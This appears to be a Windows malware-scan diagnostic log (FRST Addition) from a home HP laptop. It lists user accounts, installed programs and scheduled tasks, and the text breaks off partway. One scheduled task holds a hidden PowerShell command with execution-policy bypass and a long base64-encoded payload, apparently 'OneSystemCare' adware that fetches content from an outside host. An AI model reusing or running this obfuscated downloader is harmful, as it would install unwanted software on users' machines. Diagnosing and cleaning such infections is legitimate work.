Windows 10 Home (X64) (2015-12-07 00:52:47)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-2478984944-2039465796-333368353-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2478984944-2039465796-333368353-503 - Limited - Disabled)
Guest (S-1-5-21-2478984944-2039465796-333368353-501 - Limited - Disabled)
Jonathan (S-1-5-21-2478984944-2039465796-333368353-1001 - Administrator - Enabled) => C:\Users\Jonathan
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
Adobe Flash Player 20 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43FF61CB7}) (Version: 4.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE03766}) (Version: 4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Avast SecureLine (HKLM\...\{2CD3C92F-EDC5-4B02-9B0A-9C1D37C58EF5}_is1) (Version: 1.0.239.2 - AVAST Software)
Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
Coyote The Outlander (x32 Version: 3.0.2.59 - WildTangent) Hidden
CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.5.6713 - CyberLink Corp.)
CyberLink PhotoDirector (Version: 5.0.5.6713 - CyberLink Corp.) Hidden
CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.1.5418 - CyberLink Corp.)
CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.4.4301 - CyberLink Corp.)
CyberLink PowerDirector 12 (Version: 12.0.4.4301 - CyberLink Corp.) Hidden
CyberLink YouCam (HKLM-x32\...\{A9CEDD6E-4792-493e-BB35-D86D2E188A5A}) (Version: 6.0.1.4301 - CyberLink Corp.)
Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Dropbox 25 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.8.2 - Dropbox, Inc.)
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
Evernote v. 5.8.6 (HKLM-x32\...\{FEDC7C10-EF67-11E4-9B07-00505695D7B0}) (Version: 5.8.6.7519 - Evernote Corp.)
Family Vacation 2: Road Trip (x32 Version: 3.0.2.59 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
Hoyle Card Games 2005 (HKLM-x32\...\{B44AA698-B221-4B3B-8CA5-E65EF6A5AF26}) (Version: 1.2.0.0 - Encore, Inc.)
HP 3D DriveGuard (HKLM-x32\...\{E8D0E2B8-B64B-44BC-8E01-00DDACBDF78A}) (Version: 6.0.28.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{1504CF6F-8139-497F-86FC-46174B67CF7F}) (Version: 2.20.51 - Hewlett-Packard Company)
HP Documentation (HKLM\...\HP_Documentation) (Version:  - HP)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8293.5264 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{61EB474B-67A6-47F4-B1B7-386851BAB3D0}) (Version: 8.1.40.3 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{D7D5F438-26EF-45AB-AB89-C476FBCF8584}) (Version: 12.0.30.219 - Hewlett-Packard Company)
HP System Event Utility (HKLM-x32\...\{8B4EE87E-6D40-4C91-B5E8-0DC77DC412F1}) (Version: 1.4.1 - Hewlett-Packard Company)
HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{EFA01423-3857-468C-B7B6-F30AA08E50BC}) (Version: 1.1.5.1 - Hewlett-Packard)
IGT Slots: Paradise Garden (x32 Version: 3.0.2.59 - WildTangent) Hidden
Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
Intel Collaborative Processor Performance Control (HKLM-x32\...\0E7DAF70-FB54-4B91-B192-7E771C25AEEB) (Version: 1.0.0.1018 - Intel Corporation)
Intel® Chipset Device Software (x32 Version: 10.1.1.9 - Intel® Corporation) Hidden
Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10600.147 - Intel Corporation)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1158 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.15.4240 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
iTunes (HKLM\...\{E690A491-702F-4DEC-9977-C015D1DBB57C}) (Version: 12.3.1.23 - Apple Inc.)
Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
Living Legends: Frozen Beauty Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Lost Lands: Dark Overlord Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 16.0.6366.2062 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mystery Expedition: Prisoners of Ice (x32 Version: 3.0.2.59 - WildTangent) Hidden
Office 16 Click-to-Run Extensibility Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden
Opera Stable 35.0.2066.37 (HKLM-x32\...\Opera 35.0.2066.37) (Version: 35.0.2066.37 - Opera Software)
PDF Converter Elite 4.0 (HKLM\...\{51807840-3627-4016-B579-A32D54097837}_is1) (Version: 4.0 - PDFConverter.com)
Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.370.99 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7564 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.0.0.59 - REALTEK Semiconductor Corp.)
Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
Star Wars Empire at War (HKLM-x32\...\{99AE7207-8612-4DBA-A8F8-BAE5C633390D}) (Version: 1.0 - LucasArts)
Star Wars Empire at War Forces of Corruption (HKLM-x32\...\{6592FDEC-2C1A-413A-9985-25FEC2F0848D}) (Version: 1.0 - LucasArts)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.97 - Synaptics Incorporated)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App for HP (x32 Version: 4.0.11.16 - WildTangent) Hidden
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2478984944-2039465796-333368353-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Jonathan\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\FileCoAuth.exe (Microsoft Corporation)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {15D4F159-847C-4876-8F6C-2D3A9B15F851} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-01-20] (Hewlett-Packard)
Task: {1F192880-6B02-411A-B8E0-3BFF632E5DB3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-31] (Google Inc.)
Task: {3DD3C169-FF2E-4083-BC62-9EFDBA87CCAB} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2016-01-19] (Microsoft Corporation)
Task: {3ED847F7-E9A3-4B3E-B370-7599C6E99510} - System32\Tasks\Opera scheduled Autoupdate 1446314695 => C:\Program Files (x86)\Opera\launcher.exe [2016-02-01] (Opera Software)
Task: {4AD36820-EBAF-40DE-997D-697CADBC567F} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-01-17] (Microsoft Corporation)
Task: {4C411F4E-EC13-4C36-AF83-654DEBB5A394} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-01-12] (Hewlett-Packard Company)
Task: {4E474ABA-D6C6-44FB-842D-80D8601DA9C7} - System32\Tasks\avast! SL Update => C:\Program Files\AVAST Software\SecureLine\SLUpdate.exe [2016-01-01] (AVAST Software)
Task: {5BB340FA-98D2-4DA0-94D1-6CD0DEC5E954} - System32\Tasks\{7E0B0E47-0F79-0808-0B11-0C0C0A7F110C} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAdQBuAGwAbwBuAGcAbwAuAGkAbgBmAG8ALwB1AC8APwBhAD0AZQBzAHoASABHAHEAUwBjAEUAeQBxAG0AeAB4AGQANQBvAFMAUABkADQAdABSAFYAQwAxAHAATABaAGQAQwBIAF8AZABqAGoAbgBKADUAagA4AHQATgBZAEkAaQBrAEcAeABaAEEAagBtAHIAbABPAEYAWQBpAFAAYwBaAEYAbgBQADAAXwA0ADcAWgA1AEsATgBNADcAcQBiAHcASQB0AHkATQA1AG4AZgB1AHIANgBFAFQAcwBzAHoANwBEAHMAcgBGAHUARABiAFUAYQBQAHgAMQBRAG0ASgBYAEcATwBNAHoATQBFAGIAMQBiAFEAbQBZADgAaAB6AEMAOQB0ADUASwBfAE8AYQBPAEQAZABjAEsAXwBMAEIAYQBSAGIAdgAyAG8AQQBGADQAdQA1AHcAdgB5AHgAZwA0ADAARwB1AEsAdgAtAHEAOQA1AEoALQBlAGcAYQBOAGUAeABVAGUAWgBWAHEANQBhAFgAZQBuAGoAZQByAGUAMwB1AGkAZABiAF8AMQA5ADcAYwBUAEwAOQBvAHQAbQBJAEwAbABKAF8AVQBlAHIAUABDAEYATwBSADYATgBwAHgATwBUADgAaABFADcARgByAHUAZQBLAGkARwBrAGEAWQBHAHAATwBYAGUAQQBNADEAaABfAG8AYgBJAFQATgBGADgAbABVAEIANgBpAE0AWgBLAF8AVgBXAG0AMQBkAE8AWgBmAEEAbABBAE4AMABzAEIAVwB2AHAAQgBjADkAbAAxAHIAUgBPAHAAdwA5AFQAbAByAEkAawBzAHUAbwBmAHYAUQBMAGoAUABhAGQAOAB0AHcAVwBDAC0AcABIAHYARgBVAGIARwA2AGQASQB5AEUAZABDAFkAOABvAE4AYwBJAEoAdAAzAEEARQBzAGsAbgA1ADQAaAB6AEIARgBfAHgAMQBUAEkASABSAC0AZQBsAG8AaABLAGIAYwBCAE4AbQBDAEkAaQBIAGoAcgBlAGwAbQA3AEcAZABqAGUANQBhAHcANABpAFMAdABVAHQAQwBmAGUAawA2AHgAbgBDAG0AdABXAF8AMABPAC0AQwB2AF8AXwBmAGkAUwA3AFcAVwBoAEkATwAyAGQASAA0AGIAVAA0ADAAUABMADQAaQB4AFEAagBOAHIANQAzADYAMQA3ADgAeAAxADYASwBuADQATABZAEUAZABxAFUAMwB0AC0ARwBoADAAWgBfAHIAYwAwAGwAXwBoAEcAaQBMAFMAcABSADEAdABwAGcAOQA2ADQAZgBwAEcAQgBhAEoATgBvADQANwBWAEwAOQBqAGwAXwB3AGgAbQBQAHIAUQA4AFMAbAB3AGIARQBGAC0AaQBoAGsAWgBWAHgATABBAE8AOABOAE0AWgA1AEoARQAtAFcAdABrAGgAVABDADkAbwBzAE0AUwBDAEkAbQBPAGwATgBIAG4AdQB3AEoAMwBzAFoAeQAzADQAMAA5AFgASAAwAFMAawAwAHUAZQBaAE8AYQBGAFkAQgA1AEUAMABoADMAagBtAG0AcwAzAEIAMQBfAHQAZAB5AFAAcwBGADkALQBtADcAdwBmAFUAVQBNAEIAOQBOAFcASgBMAG0AbgBIAHYAZABmADgAUABKAEMAdQBuADcAVwBIAC0ASwAyADAARAB2ADIAdwBlAEUAWABVAHMATAA1AEcAegBWAGwASgBmAFUAbgBmAGMASAB3AEwAVwByAEkAdAA3AEcANABjAG0ATgAzAGUASwBPAC0AQwB6AG8AYwBtAGsAcgBlAE4ANABqAG4ATQB0ADQAQgBWAEQAYwAyAGkAbABNAGsAUwB5ADgAZQBTAGgAQQB4AEgAYwB1AGIAXwBaADMAVABYAG0AWgBFADgAaQBzAHgAeQBoADkAMABmAGYASAB6AHAATgB5AHkANAB6AFkAcgAwADIAeQBUADIAQgBWADQAMwB4AFIATgBYAG4ASwBEAEoASwAwAGwASgBZAEcAaAAyAHMAUwB6AEEANABzAHgANABQAGoALQBZADgANABvADUASQBHAHUATgBQAEsAYgBGAHAAMwBmADcAaABIAHMAcwBhADEAbABMAGsAeQBfAF8ARgBlAGYAeABIAGkANQBaADMASgA5AG4AbABfAHgANwB4AHAATAA0AGcAUQBHAGQAawBXAGgANABxADYAdQBzADkAdwBXADEAUQA3AE0AWgBBAC0AbQBNAG8AVwBYAGoAdABEAEsAYgBHAFoAeABjADAAZwB1AHUAbwAzAFEAdABQAEsAegB4AG0AagBlAG0AOQB6ADYAMgBsAGwAZQBZADcANwBUAFgANwA5AFUAYwAwAEMAWQBwAF8ARgAmAGMAPQBvAEoAeABSAEYAUABOAFAALQB6AEkARQBxAHMAQQBPAFcARQBaADAAOABnAE8AZgBuADMAZABhAGsAZQA1AG8AcABZAGgAcwBYAEkAYgBfAEcAQgBSADEASQA4AHEAawB3AEIAcwBZAGQAYwBEAGUARwBUAHAAZwBDAFoAbQBDAHQAawBPADYARQBfAHQAbgA4AHcASgBoAEgAMAAwAFQAVgB3AEwATgBCADUAegBxAE0AVQBYADEAUwB0AGIAWABCAGQAbQBaADMAQgBtAGwASwBKAFAAdwBkAGIANgA5AHYAdgBoAC0AdwA1AFEAbQBjAFQAdABFAGUARAA3AHAAVABVAGUASQA0AGsAMQA0AGkAcwBYAGEANwBEAEIAOAA5AEUAUwB5AEIANQBUAHIARgA5AFoAOABRAG8AbQBtADYASABCAHMAawBlAGEAQwBoADIAMQBRAEsAQgBBADIAVwA0AGQAZgB2ADkAaQBYADYAZAB0ADIAVgBRADEAWgBOADEAUgBOAGYAaQB6AE4AagBYAFMAaABUAFgAUwB6ADAAWQBpAE4ANwBFAFkAcwAxAEYARAAwAEoALQBuAFUAdQA1AHYAQgBYAHEANQBzAHIARABEADUALQAwAFcAWABXAHEAVAAtAEwAMgB2AGIAVQBEAGMATgBMAFMAOAA1AEEAcAB4AEwAbABlADEARQBYAHEATQBmAEYAUgBIAC0AawBMAHcAWQBXAGsAZQB0AFUARQA5AGsAQQBMAEoAcQBNAEIAOQBEAEkATQB0AHYAWQB5AGcAWQBPAFkAcwByAGUAMQBCAHcATwB1AHcAcgBTAGcAbgBrADIAbQBaAF8AZgAtAFQAeQBJAFYASgBFAGsAXwBzAF8ATAA1AGUAMABRAF8AMwBjAGcAQQBEAGkATwBKAEgAUQBLAFQATwBPAHgATAB4AGEAegBFAHMATgBpAFQAQgBxAFoASgB3AHMAcQBQAGgAdwA1AFUAQQB2AGcAXwB1ADIAOABaAG0AawBFAEkATwBwAEEAdQBSAHIAVgB3ADcAMQB3ADgASABiAHIAVwBlADkAMgByADMAeABnAEIASAAzAHUAVgAzAFUASQBvAG4AagBZAGsAYQA0AHEAQwB0AFcALQB2AFQAeABrAHIAXwBuAHIAaQBNAGcATABHAGMAZwBKAGsANQB2AGQALQAtAGsASwBtAHYAaAA0AF8AcABFAGcATQAtAGgAOABnADIAYgBQADUANAAwAHgATQBMAHMAdQA2AGUAVQBGADYAYQAyAEEAVQBQAGcAQgBmAGYAaABHAGoAMwB1AEQARABSAHEAMwBvAFQAbQBBAFcAYQBGAFgAagBwADMASgBqAFkALQA0ADIAUwBLAEkAMQBIAHUAVwBBAHcAZgB5AEYAdABJAG0AeABtADMARQBqAFQASgA0AFIAeABLAHIATQBRADUAegB6AGoAaQB4AC0ANgAtAFcANgBoAEUAVQBxAFMAMgA3ADgAZQBvAEQATABxAEQAWgBNAEYAUQBjAGgAYQBPAHkAdgBlAEcAcwBBADMAVwBVAEoAYgBaAGIARwBqAHIAdAB4AEwAZABhAFkAYQA1AF8AZgBrAEwAUQA5AHMASgA5AGkANABPAFIAMwA2AHEAVABFAEoAbQBvAFMAbABVADEAYQBHAEsATwBkAGEAVABUAEEAQQBMAFkAeQA0AEMASgA4AFEASgB1AE4AVQBOAFIASgBEAE0AcABQAHQAOABVADIAeQBMAEcARgB6AGQAXwBOAHMASQBqADEAbABNAEsAagBzAG0AagBKAG0AUAA1AEYAUQBWAFgATQBnAEsAUgAtAHUARABLAE4AZwAyAE0AbQBJAGIAeAA1AFUAZQBSAGQAMQA0AHYAdABOAEYANgByAFUAdABlAEwAUgBKAEkAeAA0AGcASABSAHMANQAtAEcAZgBxAFMAMwBUAFoAUQBBAEcAZgB5AEYAOAAzADQASgA1AGkAdwA0AG0AYgB4AEgASABmADgAMQB6ADYAUgBOAHkAWQBsAE8AbwBLAFcAdgBlAFcALQBfAF8ASwB5AGUATgBzADYAVwBKAFUARwBMAFUARQBXADQAbgBnAGQAeABXAFgAZwA4ADMAdgBHAHoAVQB1AEkALQBOADgAbgB5AFcANQA2AFYAOAB0AEcAawBkADUASwBZAFkAZQBZAEEAaABIAGUAUgAzAEwAbQAtAHEAYQBpADgAdwBMAGgAeABlAHAAVABiAEcAawBBADUAagB3ADcAOQBuAEkANAByAG4AcgA2AHkAVABrAHEAZAA4AFUAVQBsAGwANQBKAHIAeQBUAHMATQA1AFIAUABtAHMAeABXAF8ANQBVAHQAaQBHAG4ATwB5AFkAVgBHAHoAeQB2AEkAMwB1AEIARwBQAGIASQAxAGQAQQBiAHgAbgBnAHoAQwBRAFgAMgBoAGwAagBlAHEAbwB6AEkAUQBRADcAZgAyAHUAXwBQAGkAdABEADQAaQA5AEMAegBiAE8AJgByAD0AMwAzADEAMQA3ADAANQAyADMAOAA3ADAAOQA2ADUANwA3ADcAMgAiADsAJABzAHQAcwBrAD0AIgB7ADcARQAwAEIAMABFADQANwAtADAARgA3ADkALQAwADgAMAA4AC0AMABCADEAMQAtADAAQwAwAEMAMABBADcARgAxADEAMABDAH0AIgA7ACQAcAByAGkAZAA9ACIATwBuAGUAUwB5AHMAdABlAG0AQwBhAHIAZQAiADsAJABpAG4AaQBkAD0AIgBTAEoATABLAEwATQBNAEoAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqA